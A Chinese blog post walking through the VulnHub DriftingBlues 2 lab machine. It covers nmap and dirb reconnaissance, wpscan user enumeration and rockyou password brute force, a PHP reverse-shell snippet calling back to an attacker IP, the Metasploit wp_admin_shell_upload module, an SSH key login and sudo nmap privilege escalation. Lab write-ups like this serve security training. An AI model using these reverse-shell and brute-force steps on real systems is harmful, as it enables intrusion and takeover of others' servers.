VulnHub-driftingblues2

最新推荐文章于 2024-05-31 11:25:26 发布
最新推荐文章于 2024-05-31 11:25:26 发布
阅读量462 收藏 1
点赞数 2
分类专栏: 内网渗透 VulnHub 文章标签: linux ssh 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sanqin_/article/details/118463716
版权

靶机 DHCP 未能正确分配 IP :看这里
靶机地址:http://www.vulnhub.com/entry/driftingblues-2,634/

按照流程先用nmap扫描

nmap -sP ip/mask		#扫描局域网内存活主机
nmap -sV -A -p- ip		#扫描靶机开放服务

21端口开放ftp,22端口开发ssh,80端口开放http
在这里插入图片描述
访问网页无内容,只有图片
在这里插入图片描述
匿名用户访问ftp

ftp
ftp open ip		#访问目标
ls				查看当前目录
get fileName	#下载文件
exit			#退出

在这里插入图片描述
查看图片,挺迷惑的,也没看见隐写啥的

binwalk imgName		#查看图片隐写

在这里插入图片描述
可能方向错了,爆破一下网页目录看看

dirb http://ip

可访问blog目录,以及发现是用WordPress搭建的
wp-admin访问不了,blog可以
在这里插入图片描述
blog网页内点击连接访问不了
在这里插入图片描述
发现是用域名访问的,添加host
在这里插入图片描述
网页可访问
在这里插入图片描述
那用域名访问wp-admin应该也是可以的
在这里插入图片描述
上 wpscan 爆破用户,看见用户名:albert

wpscan --url http://driftingblues.box/blog/ -e u

在这里插入图片描述
继续爆破密码,使用kali自带的字典爆破

wpscan --url http://driftingblues.box/blog/ --passwords /usr/share/wordlists/rockyou.txt --usernames albert

躺一会,密码就出来了:scotland1
在这里插入图片描述
进行登入,然后按照流程,进行反弹shell
在这里插入图片描述
php反弹shell

$ip="ip";
$port=port;
$sock = fsockopen($ip, $port);
$descriptorspec = array(
        0 => $sock,
        1 => $sock,
        2 => $sock
);
$process = proc_open('/bin/sh', $descriptorspec, $pipes);
proc_close($process);

反弹失败了 = = 不过都是小问题,上msf
在这里插入图片描述
在这里插入图片描述

use exploit/unix/webapp/wp_admin_shell_upload	#设置模块
show options									#查看模块需要的参数
set name 参数									#设置参数
run 											#启动

在这里插入图片描述
这样就妥了,先进入shell看看有啥

shell -t

进入家目录,发现一个文件夹,进入文件夹看见user.txt,但是无权限访问
在这里插入图片描述
进入ssh
在这里插入图片描述
发现rsa,将其保存到本地,使用rsd进行登入,get第一个flag

chmod 400 id_rsa				#修改权限,rsa需要400权限才可用
ssh freddie@ip -i id_rsa		#使用rsa进行登入

在这里插入图片描述
查看一下sudo有什么提示

sudo -l

在这里插入图片描述
使用nmap提权
在这里插入图片描述
这时是看不见输入的,使用reset + bash即可
进入root目录,查看文件,getFlag
在这里插入图片描述

阿杰_
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub--driftingblues:2
venu_s的博客
06-03 392
靶机介绍 difficult:easy goal:get flags download:https://download.vulnhub.com/driftingblues/driftingblues2.ova 信息探测 主机发现 端口扫描 目标主机开放了21端口,有一张图片,可以匿名登陆;此外还开放了22端口和80端口 访问ftp,下载图片,图片不知道有啥用,先放着 80端口目录扫描 可以看出目标主机使用了WordPress,访问80端口 查看源码,就是一张图片 访问/blog,发现是一些博客
vulnhub靶机DriftingBlues: 2渗透笔记
liver100day的博客
07-26 849
文章目录环境准备1. 信息收集1.1 主机发现1.2 端口扫描1.3 访问80端口(http服务)2.漏洞利用2.1 ftp匿名登录漏洞2.2 爆破目录 环境准备 靶机环境搭建 攻击渗透机: kali IP地址:192.168.33.128 靶机:DC-7 IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/driftingblues-2,634/ 1. 信息收集 1.1 主机发现 使用arp-scan -l获取目标靶机IP地址 arp-scan -l 扫描局域网所有设备
vulnhub-Nagini.txt
06-10
Nagini
VulnHub-Tr0ll1.zip
01-12
VulnHub-Tr0ll1靶机学习笔记,一部分是学习笔记过程,另一部分是学习过程整理的lol.pacp\.c文档、user.txt等文档,供大家参考学习
Vulnhub--DriftingBlues-2靶机通关详解
m0_72634167的博客
03-28 659
1.图片隐写的认知2.wpsacn工具的使用3.ssh公私钥的认知4.nmap文件的提权方式。
Hackthebox e Vulnhub - Dicas e Truques.pdf
10-06
网络安全渗透测试
靶机19 driftingblues2
honest_gg的博客
10-31 955
获取标志 难度:简单
vulnhub靶机DriftingBlue6
weixin_52450702的博客
12-16 268
vulnhub靶机driftingbules:6
靶机渗透练习02-driftingblues2
Force~
03-25 1975
靶机地址: https://www.vulnhub.com/entry/driftingblues-2,634/ 1、主机探活 arp-scan -I eth0 -l (指定网卡扫) masscan 192.168.184.0/24 -p 80,22 netdiscover -i eth0 -r 192.168.184.0/24 2、端口扫描 nmap -A -sV -T4 -p- 靶机ip 得到如下信息 21—ftp—ProFTPD–同时还有 anonymous 匿名登录 22—ssh—Open.
vuln靶机--driftingblues2
bobo_milk的博客
05-15 283
目录 一、信息收集 二、漏洞发现 三、漏洞利用 四、权限提升 总结 一、信息收集 常规的主机发现以及端口扫描,扫描自己所在的网段。 nmap 192.168.216.0/24 nmap -A -v -T4 -p 1-65535 192.168.216.148 二、漏洞发现 先来看看21端口,支持匿名登录,因此我们上去看看有什么资料可以下载下来进行分析 ftp 192.168.216.148 帐号:ano...
Vulnhub-CTF-Writeups:此备忘单针对CTF玩家和初学者,以帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章
05-28
Vulnhub-CTF-Writeups 该备忘单针对CTF玩家和初学者,可帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章。 我们已经根据我们的经验执行并编制了此列表。 请与您的联系分享此信息,并...
VulnHub-Walkthroughs:Alienum的md格式的VulnHub演练
03-07
VulnHub-Walkthroughs:Alienum的md格式的VulnHub演练
CentOS 7基础操作05_Linux查看及切换目录
最新发布
IT_zhangsan
05-31 785
pwd命令用于显示用户当前所在的工作目录位置,工作目录是用户操作文件或其他子目录的默认位置起点。使用pwd命令可以不添加任何选项或参数。
Linux - 磁盘的分区和挂载
weixin_45735487的博客
05-27 742
逻辑分区只能在拓展分区上划分,编号5-15。拓展分区编号1-4,拓展分区不能格式化。rescue 恢复分区,对于误删的分区进行恢复,语法: rescue 起始 结束。rm 删除分区,后接要删除的分区编号。(L) 在主分区和拓展分区划分完之后,默认提示划分逻辑分区。n 进行磁盘分区,这里会默认MBR标签。(p) msdos下,会默认选择先划分主分区。
【Linux】升级GCC(版本9.3),补充:binutils
yannan20190313的博客
05-27 793
【Linux】升级GCC(版本9.3),补充:binutils
Linux echo命令(在终端输出文本)
Dontla的博客
05-22 873
echo是Linux和Unix系统中常用的一个命令行工具,主要用于在终端输出文本。该命令非常简单,但是它在脚本编程和日常系统管理中扮演着重要的角色。
【Linux】中常见的重要指令(下)以及重要的几个热键
2401_84568462的博客
05-27 1184
find指令查找的文件不能当前路径下(可以这样理解:如果要查找当前路径下可以使用ls指令,就不麻烦find指令了),必须查找当前路径下的目录里的文件。1.能被打包压缩的一定是由多个文件组成的,打包压缩后将文件变为一个整体,在传递给其他用户时不容易缺失。.tar打包后缀 .gz压缩后缀 XXX.tar.gz ----->XXX.tgz。功能:在系统特定的路径下查找,及可以找到可执行程序,有可以找到手册,安装包和压缩包等。命令在目录结构中搜索文件,并执行指定的操作。功能:在指令路径下搜索指令文件。
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。对于想要提高渗透测试技能的安全从业者来说,这是一个非常有用的学习资源。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值